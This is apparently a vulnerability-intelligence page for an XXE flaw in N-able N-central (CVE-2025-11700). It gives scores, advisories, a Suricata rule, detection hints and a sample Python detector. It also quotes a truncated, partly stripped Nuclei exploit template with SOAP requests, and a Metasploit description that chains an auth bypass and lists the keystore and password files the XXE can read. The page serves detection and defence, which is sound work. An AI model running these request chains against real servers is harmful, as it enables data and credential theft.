CVE-2025-11700
Published 2025-11-12
CVE-2025-11700: N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure
Priority: P183 · high · 7.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 31.04% (98.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| n-able | n-central | < 2025.4 | 2025.4 |
Detection & IOCs
url: /dms/services/ServerUI
url: /dms/services/ServerMMS
command: ns1:applianceLogSubmit
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)"; flow:established,to_server; http.uri; content:"/dms/services/ServerMMS"; fast_pattern; http.request_body; content:"ns1:applianceLogSubmit"; content:"|3c 21|ENTITY|20|"; pcre:"/^\s*?(?:\x26\x23(?:x25|37)\x3b|\x25|[a-z]+)\x20[a-z]+\x20[A-Z]+\x20[\x22\x27][^\x22]*[\x22\x27]\x3e/R"; reference:url,horizon3.ai/attack-research/attack-blogs/n-able-n-central-from-n-days-to-0-days/; reference:cve,2025-11700; classtype:web-application-attack; sid:2065811; rev:1; metadata:affected_product N_Able, attack_target Server, tls_state TLSDecrypt, created_at 2025_11_18, cve CVE_2025_11700, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes: |3c 21|ENTITY|20|
- The XXE payload is base64-encoded and submitted as the log content field; look for base64-encoded XML DOCTYPE/ENTITY declarations in the body of requests to /dms/services/ServerMMS.
- The Nuclei template confirms exploitation by checking for a DNS interaction via interactsh, indicating out-of-band XXE exfiltration; monitor for unexpected DNS lookups originating from N-Central servers.
- The Metasploit module exploits CVE-2025-9316 (auth bypass) first via sessionHello SOAP to ServerMMS with various appliance IDs, then triggers XXE via importServiceTemplateFromFile; correlate unauthenticated sessionHello requests with subsequent XXE activity.
- Snort/Suricata rule SID 2065811 targets TLS-decrypted traffic; deploy with SSLDecrypt/TLSDecrypt capability to detect this attack at the perimeter or internally.
- Sensitive files targeted by the XXE read primitive include the PostgreSQL dump, encrypted keystore, and keystore master password; monitor file access to these paths on N-Central hosts.
- The Snort rule requires TLS decryption (TLSDecrypt/SSLDecrypt) to be effective, as N-Central traffic is served over HTTPS (HTTP/2); without TLS inspection the rule will not fire.
- Affected versions are strictly N-Central < 2025.4.0.9; instances already patched to 2025.4 or later are not vulnerable.
- Full exploitation of CVE-2025-11700 (XXE) in the Metasploit module is chained with CVE-2025-9316 (unauthenticated session bypass); detections focused solely on authenticated XXE may miss unauthenticated exploitation paths.
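
A minimal detector for the first hint above, added here as an example (it is not taken from the page's sources or from any vendor tooling): it decodes base64 runs in request bodies sent to the two SOAP endpoints and flags DOCTYPE/ENTITY declarations, which the Suricata rule's plain-text byte match cannot see. The element names `logType` and `logContent`, the helper `_soap` and both sample bodies are constructed for illustration.

```python
import base64
import binascii
import re

# Endpoints named on this page; only requests to these paths are inspected.
WATCHED_PATHS = ("/dms/services/ServerMMS", "/dms/services/ServerUI")
# Declaration markers; the second is the rule's |3c 21|ENTITY|20| byte pattern.
MARKERS = (b"<!DOCTYPE", b"<!ENTITY ")
# Base64 runs long enough to carry a DOCTYPE declaration.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")


def _decode(run: bytes):
    """Decode a base64 run, tolerating missing padding; None if it is not base64."""
    run = run.rstrip(b"=")
    run += b"=" * (-len(run) % 4)
    try:
        return base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_xxe_markers(uri: str, body: bytes):
    """Return (encoding, marker) pairs found in a request body to a watched path."""
    if uri.split("?", 1)[0] not in WATCHED_PATHS:
        return []
    hits = [("plain", m.decode()) for m in MARKERS if m in body]
    for match in B64_RUN.finditer(body):
        decoded = _decode(match.group())
        if decoded:
            hits += [("base64", m.decode()) for m in MARKERS if m in decoded]
    return hits


def _soap(content: bytes) -> bytes:
    """Constructed request body; logType/logContent are hypothetical element names."""
    return (b"<ns1:applianceLogSubmit><logType>NETWORK_CHECK_LOG</logType><logContent>"
            + base64.b64encode(content) + b"</logContent></ns1:applianceLogSubmit>")


# Constructed samples: the entity points at a reserved .invalid placeholder host.
SAMPLE_BODY = _soap(b'<!DOCTYPE d [<!ENTITY % p SYSTEM "http://placeholder.invalid/p.dtd">]><d/>')
BENIGN_BODY = _soap(b"2025-11-18 12:00:01 network check completed, 0 errors")

if __name__ == "__main__":
    for body in (SAMPLE_BODY, BENIGN_BODY):
        print(find_xxe_markers("/dms/services/ServerMMS", body))
```

Run it over decrypted request bodies (proxy or WAF logs); like the Suricata rule, it sees nothing without TLS inspection.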
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v4.0 | 8.4 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 8.4 | HIGH | |
GHSA
GHSA-89f8-292w-gfh4: N-central versions < 2025
ghsa_unreviewed·2025-11-12
CVE-2025-11700 [HIGH] CWE-611
N-central versions < 2025.4 are vulnerable to an XML External Entities injection leading to information disclosure
VulnCheck
N-able N-Central Improper Restriction of XML External Entity Reference
vulncheck·2025·CVSS 8.4
N-central versions < 2025.4 are vulnerable to multiple XML External Entities injection leading to information disclosure
Affected: N-able N-Central
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-11700
Exploit PoC: https://vulncheck.com/xdb/685f9ef57d2b
Suricata
ET WEB_SERVER N-able N-central Authenticated importServiceFromFile XML External Entity Injection (CVE-2025-11700)
suricata·2025-11-18·CVSS 8.4
Nuclei
N-central - XML External Entities Injection
nuclei·CVSS 8.4
N-central versions
%xxe;
]>
{{rand}}
```yaml
http:
  - raw:
      - |
        POST /dms/services/ServerUI HTTP/2
        Host: {{Hostname}}
        Content-Type: text/xml
        Soapaction: ""

        3

    matchers-condition: and
    matchers:
      - type: word
        words:
          - SessionID
          - sessionHelloResponse
        condition: and
        internal: true
      - type: status
        status:
          - 200
        internal: true
    extractors:
      - type: regex
        part: body
        name: sessionid
        group: 1
        regex:
          - ']*>(\d+)'
          - '(\d+)'
          - '(\d+)'
        internal: true
  - raw:
      - |
        POST /dms/services/ServerMMS HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml; charset=utf-8

        {{sessionid}}
        NETWORK_CHECK_LOG
        {{base64(xxe_payload)}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - Ok
          - Msg
        condition: and
        internal: true
  - raw:
      - |
        POST /dms/service
```
Metasploit
N-able N-Central Authentication Bypass and XXE Scanner
metasploit·CVSS 8.4
This module scans for vulnerable N-able N-Central instances affected by CVE-2025-9316 (Unauthenticated Session Bypass) and CVE-2025-11700 (XXE). The module attempts to exploit CVE-2025-9316 by sending a sessionHello SOAP request to the ServerMMS endpoint with various appliance IDs to obtain an unauthenticated session. If successful, it then tests for CVE-2025-11700 by writing an XXE payload file and triggering it via importServiceTemplateFromFile.

Files of interest that can be read via XXE:
- /opt/nable/var/ncsai/etc/ncbackup.conf
- /var/opt/n-central/tmp/ncbackup/ncbackup.bin (PostgreSQL dump)
- /opt/nable/etc/keystore.bcfks (encrypted keystore)
- /opt/nable/etc/masterPassword (keystore password)

Affected versions: N-Central < 2025.4